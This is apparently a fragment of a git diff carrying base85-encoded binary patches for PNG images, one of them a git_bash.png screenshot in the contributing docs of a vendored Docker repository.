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

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/contributing/images/git_bash.png b/vendor/github.com/docker/docker/docs/contributing/images/git_bash.png
new file mode 100644
index 0000000000000000000000000000000000000000..be2ec73896dbb540dbb3d24cf76e38ec8049e833
GIT binary patch
literal 26097
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
